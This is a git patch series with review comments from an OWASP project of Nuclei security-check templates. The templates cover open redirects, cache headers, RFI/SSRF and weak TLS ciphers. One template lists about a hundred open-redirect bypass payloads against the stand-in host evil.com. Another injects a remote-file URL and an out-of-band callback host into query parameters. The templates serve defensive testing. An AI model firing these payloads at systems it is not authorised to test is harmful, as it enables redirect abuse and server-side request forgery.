@@ -73,7 +72,6 @@ requests: - "http" - "dns" - - raw: - | POST {{BaseURL}} HTTP/1.1 @@ -108,10 +106,9 @@ requests: - '127.0x0.0x0.0x1' - '2130706433' - stop-at-first-match: true matchers: - type: word words: - - "{{restricted_path_keyword}}" + - "{{restricted_path_keyword}}" \ No newline at end of file From 43eeccbd60e3b79e30d735866ecb99d06a30764c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 20 Apr 2024 08:38:03 +0000 Subject: [PATCH 091/129] Vulnerable Page Updated. --- Vulnerable-Pages | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 266f974..3f08db3 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 266f9741658e1da4ac76d42e5121f0721063070c +Subproject commit 3f08db358ce0af06e2c142a87f448fe1e3cafc1a From 66460bf1f253fa6a2e71b3cb3f9336791dde24b4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 20 Apr 2024 08:42:37 +0000 Subject: [PATCH 092/129] Fix status badge --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 96dbdc2..ad75d32 100644 --- a/README.md +++ b/README.md 
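Review bot: in `templates/12.6.1.yaml` the IPv6-form entries of `localips` (`0000:0000:0000:0000:0000:ffff:127.0.0.1`, `0000:0000:0000:0000:0000:ffff:7f000001`, `0:0:0:0:0:ffff:7f000001`) are interpolated into `http://{{localips}}/admin` without brackets, giving URLs such as `http://0:0:0:0:0:ffff:7f000001/admin` in which a URL parser reads everything after the first colon as a port and rejects the host; write them as `[...]`. `restricted_path: "/admin"` is declared but the request hard-codes `/admin`, and `restricted_path_keyword: "Welcom to Admin Panel"` is both misspelled and a guess about the target's page; use the variable in the path and document that the keyword must be set per target with `-var`. `whiltelist_host` is misspelled (and `allowlisted_host` would match the "allow list" wording of the `description`). The template uses the legacy top-level `requests:` key where the other templates in this series use `http:`; switch for consistency. The follow-up "fix template validation action" commit strips trailing whitespace but also drops the file's final newline (`\ No newline at end of file`), which the repository's YAML lint workflow is likely to flag; keep the newline.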
@@ -1,6 +1,6 @@ [![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) -[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F&label=🎯Vulnerable%20Pages&url=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F)](https://snbig.github.io/Vulnerable-Pages/) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://spotless-frog-wetsuit.cyclic.cloud/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://spotless-frog-wetsuit.cyclic.cloud/)](https://spotless-frog-wetsuit.cyclic.cloud/) # OWASP ASVS Security Evaluation Templates with Nuclei From 7df30c6c2cfbbd6d0043ca506137c3b6e47f13ca Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 29 Apr 2024 05:21:39 +0000 Subject: [PATCH 093/129] Update Submodule --- README.md | 2 +- Vulnerable-Pages | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ad75d32..0b0a00e 100644 --- a/README.md +++ b/README.md 
@@ -1,6 +1,6 @@ [![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) -[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://spotless-frog-wetsuit.cyclic.cloud/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://spotless-frog-wetsuit.cyclic.cloud/)](https://spotless-frog-wetsuit.cyclic.cloud/) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) # OWASP ASVS Security Evaluation Templates with Nuclei diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 3f08db3..156d51d 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 3f08db358ce0af06e2c142a87f448fe1e3cafc1a +Subproject commit 156d51de7c29edffa27f9ef0fd341a668f965fd8 From 198f60a068336cfee86945e23a12ff62ba24796a Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 07:47:31 +0000 Subject: [PATCH 094/129] Create 5.1.5.yaml --- templates/5.1.5.yaml | 138 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 138 insertions(+) create mode 100644 templates/5.1.5.yaml diff --git a/templates/5.1.5.yaml b/templates/5.1.5.yaml new file mode 100644 index 0000000..d5d33f9 --- /dev/null +++ b/templates/5.1.5.yaml 
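Review bot: the "Vulnerable Pages" URL is hard-coded in the badge and has now changed three times in this series (`snbig.github.io/Vulnerable-Pages`, then `spotless-frog-wetsuit.cyclic.cloud`, then `vulnerable-pages.onrender.com`) with the submodule bumped alongside; keep the canonical address in one place and update the templates that cite it, since `templates/5.1.5.yaml` below adds a `reference` to `https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/` after this change. The commit message "Update Submodule" does not mention the README edit it carries; list both.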
@@ -0,0 +1,138 @@ +id: ASVS-4-0-3-V5-1-5 + +info: + name: ASVS 5.1.5 Check + author: AmirHossein Raeisi + severity: low + classification: + cwe-id: CWE-601 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html + - https://cwe.mitre.org/data/definitions/601.html + - https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect + tags: asvs,5.1.5 + description: | + Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. + +variables: + vulnerable_parameter: "url" + +http: + - method: GET + path: + - "{{BaseURL}}/{{payload}}" + - "{{BaseURL}}//{{payload}}" + - "{{BaseURL}}/?{{vulnerable_parameter}}={{payload}}" + + payloads: + payload: + - '%0a/evil.com/' + - '%0d/evil.com/' + - '%00/evil.com/' + - '%09/evil.com/' + - '%5C%5Cevil.com/%252e%252e%252f' + - '%5Cevil.com' + - '%5cevil.com/%2f%2e%2e' + - '%5c{{RootURL}}evil.com/%2f%2e%2e' + - '../evil.com' + - '.evil.com' + - '/%5cevil.com' + - '////\;@evil.com' + - '////evil.com' + - '///evil.com' + - '///evil.com/%2f%2e%2e' + - '///evil.com@//' + - '///{{RootURL}}evil.com/%2f%2e%2e' + - '//;@evil.com' + - '//\/evil.com/' + - '//\@evil.com' + - '//\evil.com' + - '//\tevil.com/' + - '//evil.com/%2F..' + - '//evil.com//' + - '//%69%6e%74%65%72%61%63%74%2e%73%68' + - '//evil.com@//' + - '//evil.com\tevil.com/' + - '//https://evil.com@//' + - '/<>//evil.com' + - '/\/\/evil.com/' + - '/\/evil.com' + - '/\evil.com' + - '/evil.com' + - '/evil.com/%2F..' 
+ - '/evil.com/' + - '/evil.com/..;/css' + - '/https:evil.com' + - '/{{RootURL}}evil.com/' + - '/〱evil.com' + - '/〵evil.com' + - '/ゝevil.com' + - '/ーevil.com' + - '/ーevil.com' + - '<>//evil.com' + - '@evil.com' + - '@https://evil.com' + - '\/\/evil.com/' + - 'evil%E3%80%82com' + - 'evil.com' + - 'evil.com/' + - 'evil.com//' + - 'evil.com;@' + - 'https%3a%2f%2fevil.com%2f' + - 'https:%0a%0devil.com' + - 'https://%0a%0devil.com' + - 'https://%09/evil.com' + - 'https://%2f%2f.evil.com/' + - 'https://%3F.evil.com/' + - 'https://%5c%5c.evil.com/' + - 'https://%5cevil.com@' + - 'https://%23.evil.com/' + - 'https://.evil.com' + - 'https://////evil.com' + - 'https:///evil.com' + - 'https:///evil.com/%2e%2e' + - 'https:///evil.com/%2f%2e%2e' + - 'https:///evil.com@evil.com/%2e%2e' + - 'https:///evil.com@evil.com/%2f%2e%2e' + - 'https://:80#@evil.com/' + - 'https://:80?@evil.com/' + - 'https://:@\@evil.com' + - 'https://:@evil.com\@evil.com' + - 'https://;@evil.com' + - 'https://\tevil.com/' + - 'https://evil.com/evil.com' + - 'https://evil.com/https://evil.com/' + - 'https://www.\.evil.com' + - 'https:/\/\evil.com' + - 'https:/\evil.com' + - 'https:/evil.com' + - 'https:evil.com' + - '{{RootURL}}evil.com' + - '〱evil.com' + - '〵evil.com' + - 'ゝevil.com' + - 'ーevil.com' + - 'ーevil.com' + - 'redirect/evil.com' + - 'cgi-bin/redirect.cgi?evil.com' + - 'out?evil.com' + - 'login?to=http://evil.com' + - '1/_https@evil.com' + - 'redirect?targeturl=https://evil.com' + + redirects: false + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 + - type: status + status: + - 301 + - 302 + - 303 + - 304 + - 307 + - 308 \ No newline at end of file From 9940e4ef7d9af7de4e2f5395ced219b13dcf58f8 Mon Sep 17 00:00:00 2001 
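Review bot: the Location regex requires the literal `evil\.com`, but the payload `//%69%6e%74%65%72%61%63%74%2e%73%68` decodes to `interact.sh`, so a server that redirects to it is never matched; drop it or extend the regex. `304` in the `status` list is Not Modified, not a redirect, and carries no `Location` the regex would match; remove it. The regex also accepts `evil.com` in the userinfo position (`Location: https://evil.com@example.com` passes because `@` satisfies `[^.]`) although a browser would land on `example.com`; require that what follows `evil.com` is `/`, `:`, `?`, `#` or end of line and contains no later `@`. `vulnerable_parameter: "url"` fixes a single query parameter name; say in `description` that testers should override it with `-var vulnerable_parameter=<name>` per target. With roughly a hundred payloads across three paths and `redirects: false`, the template sends several hundred requests per host; declare that in `metadata` with `max-request`, as the other templates in this series do.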
From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 13:08:12 +0000 Subject: [PATCH 095/129] fix 5.1.5.yaml --- templates/5.1.5.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/templates/5.1.5.yaml b/templates/5.1.5.yaml index d5d33f9..43c6585 100644 --- a/templates/5.1.5.yaml +++ b/templates/5.1.5.yaml @@ -10,9 +10,11 @@ info: - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html - https://cwe.mitre.org/data/definitions/601.html - https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect + - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/generic/open-redirect-generic.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/ tags: asvs,5.1.5 description: | - Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. + Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. variables: vulnerable_parameter: "url" @@ -23,7 +25,8 @@ http: - "{{BaseURL}}/{{payload}}" - "{{BaseURL}}//{{payload}}" - "{{BaseURL}}/?{{vulnerable_parameter}}={{payload}}" - + - "{{BaseURL}}?{{vulnerable_parameter}}={{payload}}" + payloads: payload: - '%0a/evil.com/' @@ -135,4 +138,4 @@ http: - 303 - 304 - 307 - - 308 \ No newline at end of file + - 308 From 49689c1d6e80db14fbbd40c351debd46aca40261 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 13:15:08 +0000 Subject: [PATCH 096/129] fix template validation action --- templates/5.1.5.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
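Review bot: two of the three hunks in this 5.1.5.yaml fix are whitespace-only, since the removed and added description lines are identical and the blank line added after the new `{{BaseURL}}?{{vulnerable_parameter}}={{payload}}` entry carries trailing whitespace; the very next commit, "fix template validation action", reverts exactly those two spots, so stripping trailing whitespace on save would have avoided the round trip. The new path entry is not a duplicate of `{{BaseURL}}/?...` when `BaseURL` carries a path (`/app?url=` and `/app/?url=` can be different resources), and a one-line comment to that effect would keep it from being "cleaned up" later.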
diff --git a/templates/5.1.5.yaml b/templates/5.1.5.yaml index 43c6585..0942052 100644 --- a/templates/5.1.5.yaml +++ b/templates/5.1.5.yaml @@ -14,7 +14,7 @@ info: - https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/ tags: asvs,5.1.5 description: | - Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. + Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. variables: vulnerable_parameter: "url" @@ -26,7 +26,7 @@ http: - "{{BaseURL}}//{{payload}}" - "{{BaseURL}}/?{{vulnerable_parameter}}={{payload}}" - "{{BaseURL}}?{{vulnerable_parameter}}={{payload}}" - + payloads: payload: - '%0a/evil.com/' From d049f244ebf1b86ab345c227b546d6244b9dd5b5 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Fri, 31 May 2024 14:44:02 +0000 Subject: [PATCH 097/129] Create 8.2.1.yaml --- templates/8.2.1.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 templates/8.2.1.yaml diff --git a/templates/8.2.1.yaml b/templates/8.2.1.yaml new file mode 100644 index 0000000..c43ca5b --- /dev/null +++ b/templates/8.2.1.yaml 
@@ -0,0 +1,33 @@ +id: ASVS-4-0-3-V8-2-1 + +info: + name: ASVS 8.2.1 Check + author: AmirHossein Raeisi + severity: low + classification: + cwe-id: CWE-525 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses + - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control + tags: asvs,8.2.1 + description: | + Verify the application sets sufficient anti-caching headers so that sensitive data is not cached in modern browsers. + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: regex + part: header + regex: + - '(?i)cache-control:.*no-store' + negative: true + + - type: Word + part: header + words: + - "Last-Modified" + - "Expires" + - "Pragma" From 900de252c21221861ce00e1d8a26f8ca87b0fde0 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Fri, 31 May 2024 15:41:25 +0000 Subject: [PATCH 098/129] Update 8.2.1.yaml --- templates/8.2.1.yaml | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/templates/8.2.1.yaml b/templates/8.2.1.yaml index c43ca5b..eeff462 100644 --- a/templates/8.2.1.yaml +++ b/templates/8.2.1.yaml @@ -23,11 +23,4 @@ http: part: header regex: - '(?i)cache-control:.*no-store' - negative: true - - - type: Word - part: header - words: - - "Last-Modified" - - "Expires" - - "Pragma" + negative: true \ No newline at end of file From 39995074ab9af5a1b607596e1be8d024190d7d01 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Fri, 31 May 2024 17:49:45 +0000 Subject: [PATCH 099/129] Update 8.2.1.yaml --- templates/8.2.1.yaml | 51 ++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 49 insertions(+), 2 deletions(-) diff --git a/templates/8.2.1.yaml b/templates/8.2.1.yaml index eeff462..0ec2564 100644 --- a/templates/8.2.1.yaml +++ b/templates/8.2.1.yaml 
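Review bot: in the newly created templates/8.2.1.yaml the two matchers have no `matchers-condition`, so nuclei's default `or` applies and the template reports a finding whenever the response lacks `no-store` or carries any of `Last-Modified`, `Expires` or `Pragma`; `Last-Modified` is present on most static responses and `Pragma: no-cache` / `Expires: 0` are themselves anti-caching directives, so that second branch flags exactly the responses the check should pass. The spelling `type: Word` should be the lowercase `word` used elsewhere in the repository. The follow-up hunk that deletes the word matcher leaves a single negative regex run against `{{BaseURL}}` only, which flags every site whose landing page is cacheable; that is normal for a public home page, so the request needs to be pointed at pages that actually carry sensitive data before the result means anything for ASVS 8.2.1.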
@@ -16,11 +16,58 @@ info: http: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}{{sensitive_path}}" + payloads: + sensitive_path: + - "/" + - "/login" + - "/logout" + - "/register" + - "/dashboard" + - "/profile" + - "/settings" + - "/account" + - "/admin" + - "/user" + - "/users" + - "/search" + - "/messages" + - "/notifications" + - "/help" + - "/support" + - "/contact" + - "/about" + - "/privacy" + - "/terms" + - "/docs" + - "/api" + - "/api/v1" + - "/api/v2" + - "/home" + - "/welcome" + - "/password-reset" + - "/forgot-password" + - "/update-profile" + - "/billing" + - "/invoices" + - "/orders" + - "/cart" + - "/checkout" + - "/confirmation" + - "/history" + - "/activities" + matchers-condition: and + stop-at-first-match: true matchers: - type: regex part: header regex: - '(?i)cache-control:.*no-store' - negative: true \ No newline at end of file + negative: true + + - type: status + status: + - 200 + - 301 + - 302 \ No newline at end of file From 41b467935d958acc696dee00805bbf02bdd4e70c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 9 Jun 2024 08:51:21 +0330 Subject: [PATCH 100/129] Add logo README.md Signed-off-by: Hamed Salimian --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 0b0a00e..2e7bdab 100644 --- a/README.md +++ b/README.md 
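Review bot: the status matcher added to templates/8.2.1.yaml admits 301 and 302, so with `matchers-condition: and` a redirect such as `/admin` -> `/login` whose 3xx response lacks `Cache-Control: no-store` is reported as a caching weakness although that response carries no sensitive data; limit the status list to 200, or set `redirects: true` and judge the final page. The `sensitive_path` list also mixes pages that plausibly hold personal data (`/dashboard`, `/profile`, `/billing`, `/invoices`, `/orders`) with public ones (`/about`, `/privacy`, `/terms`, `/docs`, `/help`, `/contact`, `/welcome`) that have no reason to be `no-store`, and each of the latter is a guaranteed false positive. With `stop-at-first-match: true` the run ends at the first cacheable path, so the report names one page rather than every affected one; drop it if the intent is an inventory. A soft 404 (200 for an unknown path) also satisfies the status matcher, which is another source of noise on sites that do not return 404 for missing routes.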
@@ -2,6 +2,7 @@ [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) [![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) +![Screenshot_2024-06-09_083924-transformed-removebg-preview](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/assets/30114463/2ec10a7f-e3c3-4e56-b4d1-07a48bbf8c0f) # OWASP ASVS Security Evaluation Templates with Nuclei From 7fce6174378105f7d437146ef8dac4d0dc177157 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 2 Jul 2024 13:11:47 +0000 Subject: [PATCH 101/129] Update Submodule --- Vulnerable-Pages | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 156d51d..7457167 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 156d51de7c29edffa27f9ef0fd341a668f965fd8 +Subproject commit 74571678dbdfb39620454cde42d2054eb2a858db From c484d26e0aa38d30b54a924ee1a1456710353997 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 15 Jul 2024 21:02:57 +0000 Subject: [PATCH 102/129] Create 12.3.3.yaml --- templates/dast/12.3.3.yaml | 46 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 templates/dast/12.3.3.yaml diff --git a/templates/dast/12.3.3.yaml b/templates/dast/12.3.3.yaml new file mode 100644 index 0000000..cd40bb0 --- /dev/null +++ b/templates/dast/12.3.3.yaml 
@@ -0,0 +1,46 @@ +id: ASVS-4-0-3-V12-3-3 + +info: + name: ASVS 12.3.3 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918, CWE-98 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + + tags: asvs,12.3.3 + + description: | + Verify that user-submitted filename metadata is validated or ignored to prevent the disclosure or execution of remote files via Remote File Inclusion (RFI) or Server-side Request Forgery (SSRF) attacks. + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + rfi: + - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt" + - "https://{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + fuzz: + - "{{rfi}}" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a" + + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" \ No newline at end of file From d90123d15b5cea2e91aba00eff39c0b85a8d87b7 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 17 Jul 2024 13:38:14 +0330 Subject: [PATCH 103/129] Add LOGO README.md Signed-off-by: Hamed Salimian --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 2e7bdab..d3023b1 100644 --- a/README.md +++ b/README.md 
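Review bot: the body matcher in templates/dast/12.3.3.yaml depends on a file hosted at snbig.github.io containing `d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a`; if that host is unreachable or the file changes, the check silently degrades to the interactsh branch, so a comment stating that `rfi.txt` must contain this marker (and ideally a copy under the project's own Vulnerable-Pages submodule) would protect the test. The `interactsh_protocol` matcher treats a bare `dns` interaction the same as `http`, but a DNS lookup of the callback host can be triggered by hostname validation or resolution without any fetch, so it is weaker evidence of RFI/SSRF than an HTTP hit; giving the two matchers `name:` values (as 5.5.2.yaml does with `linux` and `windows`) would at least make the report say which one fired.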
@@ -2,7 +2,8 @@ [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) [![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) -![Screenshot_2024-06-09_083924-transformed-removebg-preview](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/assets/30114463/2ec10a7f-e3c3-4e56-b4d1-07a48bbf8c0f) +![LOGO](https://github.com/user-attachments/assets/8f0b666e-a54c-45e9-9f33-4fa414fb122e) + # OWASP ASVS Security Evaluation Templates with Nuclei From bbdeae8a42c17d6759d4ac724cb3a953f628b6a6 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 17 Jul 2024 13:49:17 +0330 Subject: [PATCH 104/129] Fix logo alignment Signed-off-by: Hamed Salimian --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d3023b1..5c93c84 100644 --- a/README.md +++ b/README.md @@ -2,8 +2,9 @@ [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) [![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) -![LOGO](https://github.com/user-attachments/assets/8f0b666e-a54c-45e9-9f33-4fa414fb122e) - +

+ +

# OWASP ASVS Security Evaluation Templates with Nuclei From cb091adb96e56c0d069e01f37fd55bac42b36de6 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Wed, 17 Jul 2024 19:32:13 +0000 Subject: [PATCH 105/129] Create 9.1.2.yaml --- templates/9.1.2.yaml | 423 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 423 insertions(+) create mode 100644 templates/9.1.2.yaml diff --git a/templates/9.1.2.yaml b/templates/9.1.2.yaml new file mode 100644 index 0000000..ef748c2 --- /dev/null +++ b/templates/9.1.2.yaml 
@@ -0,0 +1,423 @@ +id: ASVS-4-0-3-V9-1-2 + +info: + name: ASVS 9.1.2 Check + author: AmirHossein Raeisi + severity: Low + classification: + cwe-id: CWE-918 + reference: + - https://www.acunetix.com/vulnerabilities/web/tls-ssl-weak-cipher-suites/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/ssl/insecure-cipher-suite-detect.yaml + tags: asvs,9.1.2 + description: | + Verify using up to date TLS testing tools that only strong cipher suites are enabled, with the strongest cipher suites set as preferred. + +ssl: + - address: "{{Host}}:{{Port}}" + min_version: tls10 + max_version: tls10 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - 
